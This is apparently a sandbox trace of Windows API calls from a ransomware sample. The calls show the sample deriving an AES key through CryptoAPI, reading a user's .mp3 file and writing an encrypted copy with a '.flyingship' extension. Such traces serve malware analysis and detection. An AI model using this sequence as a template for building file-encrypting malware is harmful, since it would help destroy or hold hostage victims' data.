[0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="usic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ic\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.722] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="oLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WwrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wrmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rmZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mZhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zhuo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="huo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uo4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.723] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JRSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RSQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SQYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QYNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YNIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NIKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IKKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KKQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KQeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QeiTV.mp3\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0186.724] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0186.724] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0186.724] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0186.724] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0186.724] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0186.724] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.724] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.724] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.724] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0186.724] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.724] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13b8c90, ftCreationTime.dwHighDateTime=0x1d5e3a0, ftLastAccessTime.dwLowDateTime=0x90f56120, ftLastAccessTime.dwHighDateTime=0x1d5d9a1, ftLastWriteTime.dwLowDateTime=0x90f56120, ftLastWriteTime.dwHighDateTime=0x1d5d9a1, nFileSizeHigh=0x0, nFileSizeLow=0xd1c3, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="JRSQYNIKKQeiTV.mp3", cAlternateFileName="JRSQYN~1.MP3")) returned 0x90af58 [0186.725] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0186.725] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0186.725] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.725] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.757] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.757] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0186.757] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.757] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0186.757] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.757] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0186.757] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.757] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0186.757] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.757] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.757] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.757] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0186.757] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.758] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0c00) returned 1 [0186.759] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0186.759] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.760] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0186.760] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.760] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0186.760] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.760] CryptHashData (hHash=0x90ae18, pbData=0x8df1e0, dwDataLen=0x19, dwFlags=0x1) returned 1 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0186.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.760] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90ae18, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90af18) returned 1 [0186.760] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0186.760] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0186.760] CryptDestroyHash (hHash=0x90ae18) returned 1 [0186.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\jrsqynikkqeitv.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0186.762] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0186.762] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0186.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0186.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0186.762] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26a8 [0186.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0186.762] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\rWwrmZhuo4\\JRSQYNIKKQeiTV.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\rwwrmzhuo4\\jrsqynikkqeitv.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0186.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0186.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0186.763] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0186.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.763] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0186.764] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.764] SetFilePointerEx (in: hFile=0x120, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0186.764] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xd1c3, lpOverlapped=0x0) returned 1 [0186.768] ReadFile (in: hFile=0x120, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0186.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0186.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0186.768] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0186.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0186.768] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd1c3) returned 0xbea018 [0186.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x2420020 | out: hHeap=0x8a0000) returned 1 [0186.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0186.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0186.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0186.769] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0186.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0186.769] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd1c3) returned 0xbf71e8 [0186.770] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbea018 